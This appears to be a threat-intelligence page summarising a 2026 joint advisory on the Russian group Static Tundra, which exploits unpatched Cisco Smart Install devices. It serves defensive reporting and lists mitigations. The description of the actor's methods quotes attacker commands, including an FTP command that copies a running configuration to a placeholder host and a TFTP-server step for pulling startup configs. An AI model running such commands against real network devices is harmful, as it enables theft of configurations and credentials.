Russian FSB Center 16 (Static Tundra/Berserk Bear) Exploiting Unpatched Cisco Smart Install Devices — Joint NSA/FBI/13-Nation Advisory — Threadlinqs Intelligence
As of 2026-07-19, Russian FSB Center 16 (Static Tundra/Berserk Bear) Exploiting Unpatched Cisco Smart Install Devices — Joint NSA/FBI/13-Nation Advisory is a high-severity vulnerability threat attributed to Static Tundra (Russia), tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 37 indicators of compromise.
Threat ID: TL-2026-1277 · Severity: HIGH · CVSS: 9.8 · Status: ACTIVE · Category: VULNERABILITY
Updated: 2026-07-19 · revalidated 1× · latest source
Attribution: Static Tundra · Russia · ESPIONAGE
NSA, FBI, and 12 co-signing nations issued a joint cybersecurity advisory (IC3 CSA-260713) warning that Russia's FSB Center 16 — tracked as Static Tundra, Berserk Bear, Energetic Bear, Crouching Yeti,
Static Tundra, assessed with high confidence as a sub-cluster of the FSB Center 16-linked Energetic Bear/Berserk Bear/Dragonfly cluster, has run a persistent global espionage campaign since at least 2015 against network infrastructure. The group's core objective is to compromise routers and switches to extract device configuration files en masse, banking that access for later use aligned with Russian state strategic interests. Its primary vector is CVE-2018-0171, a critical (CVSS 9.8) unauthenticated remote code execution / denial-of-service flaw in the Smart Install feature of Cisco IOS and IOS XE software: a crafted Smart Install message sent to TCP port 4786 triggers a buffer overflow that can reload the device, cause a watchdog crash, or grant arbitrary code execution. Cisco disclosed and patched this flaw in March 2018; despite a fixed release existing for over seven years, thousands of internet-facing, end-of-life devices remain vulnerable because Smart Install is enabled by default and organizations have not upgraded or disabled it (`no vstack`). Static Tundra combines this with CVE-2008-4128, a set of decade-old CSRF flaws in the Cisco IOS 12.4 HTTP administration interface on 871 ISRs, and with abuse of legacy unencrypted management protocols — SNMPv1/v2c with default or compromised read-write community strings (`public`, `anonymous`) and unauthenticated HTTP — to gain a secondary access path into devices that were never intended to be internet-reachable. Once inside a device, the actor spawns a TFTP server via `tftp-server nvram:startup-config`, connects to it to pull the startup configuration, and mines the extracted config for embedded credentials and SNMP community strings, which are then reused to pivot to adjacent devices. Persistence techniques include creating privileged (level 15) local accounts, modifying SNMP read-write strings, and — per historical FBI/Cisco reporting on this actor cluster — deploying the SYNful Knock firmware implant, a modular malicious IOS image modification that survives reboots and is activated via crafted 'magic packet' traffic. To move data and evade detection, the actor establishes GRE tunnels that redirect victim NetFlow/traffic to attacker-controlled infrastructure, exfiltrates configuration files outbound via TFTP/FTP (`copy running-config ftp://user:pass@host/output.txt`), spoofs source addresses on SNMP traffic to bypass ACLs, and modifies TACACS+ configuration to suppress remote logging of its activity. Target reconnaissance leverages native device commands (`show cdp neighbors`) plus internet-wide scan data from services like Shodan and Censys to identify vulnerable Smart-Install-enabled hosts at scale. The FBI and Cisco Talos both issued standalone warnings on this campaign in August 2025 after observing the actors collect configuration files for thousands of US-linked networking devices over the prior year, and in December 2025 the same cluster was linked to an attack on Poland's energy grid. The July 13, 2026 joint advisory — co-signed by the US, Canada, Australia, New Zealand, Czech Republic, Denmark, Estonia, Finland, France, Italy, Poland, Sweden, and the UK — confirms the campaign is ongoing, has escalated against Ukraine and allied nations since the 2022 invasion, and now spans telecommunications, higher education, manufacturing, defense industrial base, energy, financial services, government facilities, and healthcare targets across North America, Europe, Asia, and Africa. Mitigation is straightforward but requires action: patch or retire affected IOS/IOS XE devices, disable Smart Install entirely, replace SNMPv1/v2c with SNMPv3, disable Telnet/HTTP management in favor of SSH/HTTPS, enforce strong Type 8/Type 6 password hashing, and treat device configurations as untrusted (verify against a centralized, version-controlled source of truth rather than the device itself).
Weaknesses (CWE)
CWE-120, CWE-352, CWE-287, CWE-284, CWE-798
Target sectors: defense industrial base, communications, energy, financial services, government administration, health, telecoms, higher education, manufacturing
Target regions: North America, Europe, Asia, Africa, ukraine
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 37 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
VULNERABILITY, HIGH, threat intelligence, cybersecurity, CVE-2018-0171, CVE-2008-4128, T1596, T1590, T1190, T1133, T1059, T1136, T1098, T1601, T1070, T1205